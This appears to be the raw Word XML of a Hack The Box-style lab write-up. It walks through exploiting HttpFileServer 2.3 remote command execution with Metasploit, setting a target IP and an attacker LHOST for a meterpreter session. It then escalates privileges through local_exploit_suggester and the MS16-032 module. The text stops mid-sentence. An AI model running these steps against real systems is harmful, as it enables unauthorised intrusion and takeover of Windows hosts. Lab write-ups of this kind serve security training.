        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039074C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B5ED7D5" wp14:editId="4E6D2A9B">
            <wp:extent cx="5853430" cy="3902075"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="17804590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D481E" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA" w:rsidP="00D65DC9">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr w:rsidR="006D2FCA">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1360" w:right="1275" w:bottom="280" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E9475CB" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000" w:rsidP="00D65DC9">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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didn’t work</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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tested the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>payload provided</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Nessus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F496DE1" w14:textId="248C11E4" w:rsidR="0039074C" w:rsidRPr="0039074C" w:rsidRDefault="0039074C" w:rsidP="0039074C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039074C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50C48C5B" wp14:editId="6A24E8BE">
            <wp:extent cx="4396740" cy="2931001"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:docPr id="14316524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488" cy="2933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AB04" w14:textId="78F3B0AE" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E869C1" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="266"/>
      </w:pPr>
      <w:r>
        <w:t>These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positives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Nessus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442DFEE2" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="263"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339801EA" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="265" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="162"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>We found that the service ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpFileServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> httpd 2.3’ is vulnerable to Remote Command Execution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t>phase.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Let’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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exploit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Metasploit.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13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exploits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httpfileserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ using the command ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>httpfileserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698E315E" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8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960" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C4E1CC3" wp14:editId="0BB256F6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>151912</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5647590" cy="140160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590" cy="140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8C84E" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr w:rsidR="006D2FCA">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1360" w:right="1275" w:bottom="280" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF9140D" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:right="162"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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exploit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‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>use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0</w:t>
      </w:r>
      <w:r>
        <w:t>’.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exploit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 command ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">show </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">. The required options that we need to modify are RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>IP )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and LHOST </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( attacker</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>IP )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14832E03" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9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3472" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53BEC10E" wp14:editId="58011DEF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>152930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5727126" cy="300780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26" cy="3007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8E32A" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="264"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>We</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>can do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>that by using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the following </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297F6CF8" w14:textId="77777777" w:rsidR="006D2FC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2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Target_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18842E1A" w14:textId="77777777" w:rsidR="006D2FC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"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&lt;HTB_TUN_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E96447" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:ind w:left="0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593984" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3DE65096" wp14:editId="47AE6082">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>166122</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5754813" cy="62436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813" cy="62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8C08D" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="258"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Now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exploit,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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 ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t>’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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BFA302" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="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07B94926" wp14:editId="6A37FC30">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>166200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5750440" cy="184765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440" cy="184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D7000" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="254" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="164"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>We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exploited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machine.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Our next step is to perform privilege escalation to gain Administrative Privileges on the target </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031E759D" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr w:rsidR="006D2FCA">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1360" w:right="1275" w:bottom="280" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4292B1B2" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:right="159"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>First</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I tried the ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>which executes a ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ script that tries to escalate privileges, but it failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B7D335" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000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5008" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00D29EEC" wp14:editId="2B278346">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914717</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>153219</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5701212" cy="144017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212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E650D" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="272" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="162"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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decided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look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exploits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escalate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>privileges.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Metasploit module ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>local_exploit_suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’. To use that first we have to put the current ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ session to background using the command ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
      <w:r>
        <w:t>’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E7AAE5" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11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5520" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25E3EF78" wp14:editId="3466A82C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1613153</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>153705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4339897" cy="4667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897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3E0BE" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="261" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="23" w:right="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Now select the Metasploit module by using the command ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>use post/multi/recon/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>local_exploit_suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">’. Check out the required options for the module to run. The required options are SESSION </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>( id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">’ session that we put in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>background )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F21B2C9" w14:textId="77777777" w:rsidR="006D2FCA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6032" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="614E6C72" wp14:editId="18A34C69">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>151740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5714428" cy="145618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28" cy="1456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4BA17" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="269" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="160"/>
        <w:jc w:val="both"/>
      </w:pP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‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sessions</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>command.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‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>set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session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1</w:t>
      </w:r>
      <w:r>
        <w:t>’ to refer to the required session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF3BB81" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8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6544" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4BB72505" wp14:editId="4C141897">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>151949</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5631979" cy="127292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979" cy="1272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D11B7" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr w:rsidR="006D2FCA">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1360" w:right="1275" w:bottom="280" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="554D68C1" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>can run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the module using the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B894B3" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="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3A0048A6" wp14:editId="37EFE272">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>167273</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5722494" cy="268833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94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D4FAC" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2902"/>
          <w:tab w:val="left" w:pos="4075"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="left" w:pos="6756"/>
          <w:tab w:val="left" w:pos="8634"/>
        </w:tabs>
        <w:spacing w:before="268" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="23" w:right="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>We can see five possible suggestions by ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>local_exploit_suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>’ out of which, ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit/windows/local/ms16_032_secondary_logon_handle_privesc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">’ worked. We can use </w:t>
      </w:r>
